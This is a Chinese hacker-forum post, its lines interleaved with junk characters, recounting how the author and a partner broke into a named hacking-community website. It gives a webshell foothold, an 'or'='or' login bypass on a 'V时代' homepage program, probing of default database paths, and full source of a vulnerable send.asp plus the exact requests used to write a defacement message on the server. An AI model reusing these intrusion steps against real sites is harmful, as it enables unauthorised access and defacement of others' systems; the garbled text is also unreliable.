|
|
有些朋友对我和云中鹰搞华东的过程比较感兴趣,其实那个很没技术含量% f0 D' ?) o( v! H' b9 b" n1 G1 X
今天闲着无聊,把手上的项目葛一下,来论坛放松一下,顺便说说上次搞华东黑客联盟到装B的过程
, ?) J/ t" y" @1 r K" @这天云中鸡说华东的某人很牛X,利用JPG黑站大法把恶灵战队黑了,还发了个demo出来- n2 d4 ~ U% p. v( D
我去看了一下demo,感觉很黑客,于是就和云中鸡搞了一下华东+ x% r$ a0 r7 K' ^8 C6 ]1 D
首先,我记得华东只被人搞过一次(记性不好,原谅下~~),所以应该防护还是比较好的
) ? Q6 }+ `, E6 r' U' k" P6 n服务器应该防ARP,不过这还只是猜测
; d; ^6 y8 r, c! a0 L云中鸡说先不搞C段,PZ一下再说
, P# B( [& ?. p5 y) q6 K然后我就打开了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]1 A6 P0 R7 ]$ ^0 j0 E
一看,我晕,怎么网站变了................以前我比较喜欢到华东去看动画,现在怎么变成这鸟样了,晕..............
! y6 {; z" \# H7 F9 }4 d这时候云中鸡丢了一个同F的站过来,说进了后台搞不了shell7 n2 B# }$ ]5 X
我看了下搞到了一个webshell出来(这里涉及点技巧,不过不是重点,故省略....),登上webshell后发现服务器的权限很BT
0 \+ g, r* w! ~2 u8 s# l然后我就把shell丢给云中鸡去提权,过了一会儿找到了一个二级玉米的站shop.xiahack.cn7 n/ g2 r" o+ J1 H" U
看着是用eshop来架设的网店,虽然不是同F,但还是想搞下他看有什么可利用的地方,用了几个0day去搞发现不是最新版,0day用不鸟
/ Y+ k o* U0 [问了下云中鸡提权怎样了,他说还在努力,装不鸟B就不睡觉,晕了,这下入侵陷入了僵局...............1 C7 K1 y/ {% d0 W( G3 C& v
无聊到网上乱逛,这时无意中发现一个阿拉伯XXXXXX,具体就不说啥鸟,呵呵~~
; A+ E- d- A/ _$ C, O) \) u6 b然后阿拉伯黑客发现了链接标记[url=http://www.3hack.comwww.3hack.com[/url[/url]]上有个xia的目录很可疑,于是我就去看看是什么+ ]- a3 y9 ~& t6 P, M( H
打开一看,如图1所示。% D1 F/ y# p( P
; @. h4 l h7 E% s E' Y$ D3 p* Z http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg
" S. {* P- O' m$ U我靠~~这啥东西?这么帅?点进去一看,如图2所示。
/ [* H# m- V6 G
1 E9 A/ ~8 j( X$ m; t* T http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg! V5 D9 I! [7 _3 d2 y% f8 s
太帅了,真YD!!
S* K7 c6 }: g: |4 \# E这个页面应该是一套个人主页程序,而且还挺炫的!
J# f1 a9 n7 ]- n5 @1 |这个页面有发表日志的地方,应该可能存在登陆页面,找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面,如图3所示。
% t% q. m K% P* b3 B- I/ e
) ^: J2 }: x0 M! s3 Y2 G http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg2 i6 Y# p+ T E! I% p k
嘿嘿,试着'or'='or'居然进去了!!如图4所示。
X5 n- j8 f, }+ f7 h) m8 s% {) W6 I2 j. G
http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg
* Y9 o! q9 k) f经过半个多小时的摸索,还是没有发现可利用的地方。2 d- u3 {! Y5 _& P9 _9 _* {0 Y6 t
这下郁闷了,不管了,把这套程序下载下来看看吧
% b! {3 l, E% M3 i s5 m# n- }! G找了一会才知道这套程序叫做“V时代个人flash主页”
$ c' A" u; G* q# G" `* ~ w到官方下了套最新版,然后找了一下可利用的地方,不一会,我发现“/html/admin”这个目录很可能可以利用
. A8 p# h1 A, V3 p$ J, s0 f1 k+ x于是马上打开链接标记[url=http://www.3hack.com/xia/html/adminhttp://www.3hack.com/xia/html/admin[/url[/url]]) Y3 v: ^3 ^5 h: z- f$ j
返回的确实找不到页面,郁闷了,输入链接标记[url=http://www.3hack.com/xia/html/http://www.3hack.com/xia/html/[/url[/url]]9 L5 V. W& _" u, O: a1 Q& Q7 y
同样是找不到页面,真晕!再看看!/ X% q: i. {: B$ |( o4 M ~
5分钟过后,我发现后台地址是“/asp”,默认数据库是“/asp/vshidai.mdb”,嘿嘿!这下你不死定了!: Y4 h! m ]8 @7 c' q
马上打开链接标记[url=http://www.3hack.com/xia/asp/vshidai.mdbhttp://www.3hack.com/xia/asp/vshidai.mdb[/url[/url]],我晕!服务器居然设置了mdb后缀映射,下载不了!: e* I/ T. l. F$ n! q* M
打开链接标记[url=http://www.3hack.com/xia/asp/http://www.3hack.com/xia/asp/[/url[/url]],发现返回空白,这下我真是服了!8 ^: d2 t3 s7 ^4 X7 Z$ E! Z
希望快覆灭了,这时我点到了根目录下的send.asp文件,看到里面存在着一个有意思的东西,代码如下:$ l ^- m3 i' ~/ Z
y! `: a. K A( I l6 q
var a
) G8 J7 X* R v! Y; dvar b
6 i" x: q6 C: vvar tx& ?5 z t# ]2 Q" I5 ]
var clean5 j- k& h" |2 p0 c+ \; x* O
a=Request("re")' R. S f/ r- ~1 g1 b. ]% F0 E
clean=Request("clean")
7 Q# } @3 S3 D! W9 x5 j mvar jian="test.txt"
( p% L3 Z1 G: ^# W1 X9 k; `+ i% z- I: F
if(clean==1){: t5 I7 i* E" T! P- _4 T4 P
tx="&a="
2 W/ _" c" v: p p! E+ Gvar fs2
( C. {0 j- n! }/ Q7 c: \var fs2=Server.CreateObject("Scripting.FileSystemObject")
5 O [+ H# E gvar newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)0 H! D: g" B" H. Z$ D
newdt.WriteLine("&a=")2 o4 A! a) p; E0 U! K
newdt.close()
% n5 p: I, w- L+ ~6 s}( y/ D' J G8 \
2 h) |2 O: v" e5 P, `
if(clean==0|clean==1){* P0 p0 L4 r: a t( E
tx=""" Q& @$ O& h; o* E/ j
var fso = Server.Createobject("Scripting.FileSystemObject")# X& F3 f" D0 h8 \& V- G
var file = fso.OpenTextFile(Server.Mappath(jian))0 W: ?' y0 C, o2 N1 |0 A
while (!file.AtEndOfStream){# b0 Q& J8 ~0 s& l/ o
tx=file.ReadLine()
& e+ r; w3 U7 xResponse.write (tx)
: ~4 X% A* G6 c4 w: c) _}
7 S9 U1 T( R) ~# e2 X! W% DResponse.write ("&")
9 x2 X2 L( L5 Bfile.close()7 t# S. k, \( }' u4 T
}( e5 t- n% p% J( _ s& t
- x* g$ A+ O' g; N
if(clean==2){
* N; u+ J" q* ]4 c* _$ R/ @tx=""- L' F' m8 x0 g' D- l
var fso = Server.Createobject("Scripting.FileSystemObject")" B& E8 ]. R' L; J
var file = fso.OpenTextFile(Server.Mappath(jian))
% v; e" I2 [: t* \
/ x0 E% O) F' g0 c5 A6 g+ E' z! vvar fs2
$ o9 C* C# E4 |7 A" y& h: Fvar fs2=Server.CreateObject("Scripting.FileSystemObject")
" G/ v* k8 o% a* M2 ~5 I) q& ]# Pvar newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)1 z! P, n( [) n0 x, f
! L( W' R" d) ]/ _6 n) n% V' U
) C0 {! E, L! z2 s( J' {, ~5 iwhile (!file.AtEndOfStream){6 E8 C. @$ B: v' H S
tx=file.ReadLine()
! e, X. u, x" c: QResponse.write (tx)}! J4 k2 E; c& Y" k4 E- U0 S
2 G& S2 Y& D# M4 ~Response.write (a+"&")
# \6 V, h2 M+ t' }newdt.WriteLine(a)) h0 R" u7 M/ c& [% C+ p. \
0 M, g9 b$ t- P5 Mfile.close()1 I4 e% v3 ~, P( c+ k9 j
newdt.close()
" v: p, n- n% N+ u}7 _8 _& q$ l w& t
. e$ h" @3 u2 A" D' P6 j7 o& T, E; C8 u) f1 G5 l" R: c0 i
复制代码
# N! V% W, U; D8 k1 ` ?$ {! t# K这下应该可以装B了!从代码看出,我们首先要提交“send.asp?clean=1”来创建一个名为test.txt的文件,文件里面写着“&a=&”7 u& [$ d- |) V. o% i# w! C5 K
接下来我们提交“send.asp?clean=2&re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”
% O( @" s* C; n. p这样就能在test.txt文件里新建一行并写入“H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过”这句话
6 ^! J- L+ c, ?6 T" k' Y( v" a4 l过程如图5、6所示。
" [) O" S; Z8 ~. t7 A" H9 K7 Z! k4 @9 k3 M/ A* v8 ^& r1 g
http://00day.cn/forum/attachment/thumb/6_1_cd66a1c03f6682b.jpg) Z" U& w$ F$ g7 M- {- Y- J2 C
# n6 I+ J8 F# k3 ~6 `+ n http://00day.cn/forum/attachment/thumb/6_1_942adfb1ce45224.jpg- w. Y2 ?/ {! o! L" ?# T/ Z( ~- Q
提交后我们打开链接标记[url=http://www.3hack.com/xia/test.txtwww.3hack.com/xia/test.txt[/url[/url]]看看,如图7所示。; g2 G4 D4 @8 {' }) _7 K
) H4 U/ y# L8 Z0 j http://00day.cn/forum/attachment/thumb/6_1_10f60a12650b618.jpg
* k; P* O3 _, z2 \! h这下终于可以装到X了,如果不是V时代的作者写的send.asp代码存在问题,拿到shell是不难的
* I$ t" D8 e; v; v& Y* [1 K如果jian是经过request取值的话,同样也能搞到shell。2 c7 v. ?2 B9 Y% v& I; M
这次只是装到了X,并没有拿到shell
8 c9 v% ]" O1 M2 e" Q- {已经是凌晨了,跟云中J说了声就睡觉去鸟
$ c3 y+ x1 T, m$ }% |" ^4 x估计那B可能搞到了权限,不过我没问他,最近事情比较多,也比较忙7 w" G! d4 v: d5 V0 w
就到这里吧,没技术含量,纯粹装X,高手们见笑了
( `$ |( p6 V; _, X1 x- f7 g另外劝告某些认为上传个JPG就能黑到站的大黑客,你这样自欺欺人吃亏的是你自己
% T8 i; u' Q. P& q# R, K自己学不到技术,却还在自欺欺人
0 `: j; X, W' \不说了,本文到这里,最后感谢一下阿拉伯黑客,原来阿拉伯黑客也是很强大的,好了,猪大家愉快~~1 c/ }) S# z% E/ |! |# h
* O+ k3 n* S. n# _5 c! K+ O |
|